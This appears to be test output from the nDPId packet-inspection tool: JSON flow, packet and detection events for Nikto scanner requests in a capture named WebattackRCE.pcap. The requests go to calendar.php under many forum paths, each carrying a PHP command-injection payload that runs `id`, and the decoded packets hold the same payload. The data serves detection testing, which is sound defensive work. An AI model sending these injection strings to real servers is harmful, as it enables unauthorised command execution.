{"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7560000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1576420277850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1576420277850,"pkt":"AAAAAAAAAAAAAAAACABFAAEkktVAAEAGqPx\/AAABfwAAAcc0H5D516vm6SxeZoAYAED\/GAAAAQEICp1m\/4KdZv+CR0VUIC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7560000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 
Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1576420277851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277851,"pkt":"AAAAAAAAAAAAAAAACABFAAEqh81AAEAGs\/5\/AAABfwAAAcc2H5Bgvr79vMi8roAYAED\/HgAAAQEICp1m\/4OdZv+DR0VUIC9mb3J1bS9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} 
+01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1576420277854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277854,"pkt":"AAAAAAAAAAAAAAAACABFAAErhnRAAEAGtVZ\/AAABfwAAAcc4H5AJP79Gqf4KlIAYAED\/HwAAAQEICp1m\/4adZv+GR0VUIC9mb3J1bXMvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1576420277855,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277855,"pkt":"AAAAAAAAAAAAAAAACABFAAErbT9AAEAGzot\/AAABfwAAAcc6H5Be6VQGyl7\/vYAYAED\/HwAAAQEICp1m\/4edZv+HR0VUIC9mb3J1bXovY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7560000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1576420277857,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1576420277857,"pkt":"AAAAAAAAAAAAAAAACABFAAEsZgtAAEAG1b5\/AAABfwAAAcc8H5AWK18ypPoEwIAYAED\/IAAAAQEICp1m\/4mdZv+JR0VUIC9odGZvcnVtL2NhbGVuZGFyLnBocD9jYWxiaXJ0aGRheXM9MSZhY3Rpb249Z2V0ZGF5JmRheT0yMDAxLTgtMTUmY29tbWE9JTIyO2VjaG8lMjAnJzslMjBlY2hvJTIwJTYwaWQlMjAlNjA7ZGllKCk7ZWNobyUyMiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7560000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1576420277858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277858,"pkt":"AAAAAAAAAAAAAAAACABFAAEqtcxAAEAGhf9\/AAABfwAAAcc+H5DIWozz4BLqQYAYAED\/HgAAAQEICp1m\/4qdZv+KR0VUIC9ib2FyZC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1576420277860,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277860,"pkt":"AAAAAAAAAAAAAAAACABFAAEumzdAAEAGoJB\/AAABfwAAAcdAH5B97qINvJ0VaoAYAED\/IgAAAQEICp1m\/4ydZv+MR0VUIC9jb21tdW5pdHkvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7560000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1576420277861,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":309,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":309,"pkt_l4_len":275,"thread_ts_msec":1576420277861,"pkt":"AAAAAAAAAAAAAAAACABFAAEntyFAAEAGhK1\/AAABfwAAAcdCH5DLAI4n0VAE+IAYAED\/GwAAAQEICp1m\/42dZv+NR0VUIC92Yi9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7560000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1576420277863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277863,"pkt":"AAAAAAAAAAAAAAAACABFAAEuCCBAAEAGM6h\/AAABfwAAAcdEH5ADaDEo9nQ1BIAYAED\/IgAAAQEICp1m\/4+dZv+PR0VUIC92YnVsbGV0aW4vY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1576420277864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277864,"pkt":"AAAAAAAAAAAAAAAACABFAADJt5hAAEAGhJR\/AAABfwAAAcdGH5CwLY6th0R7wIAYAED+vQAAAQEICp1m\/5CdZv+QR0VUIC9fdnRpX2Jpbi9mcGNvdW50LmV4ZSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDg5KQ0KDQo="} 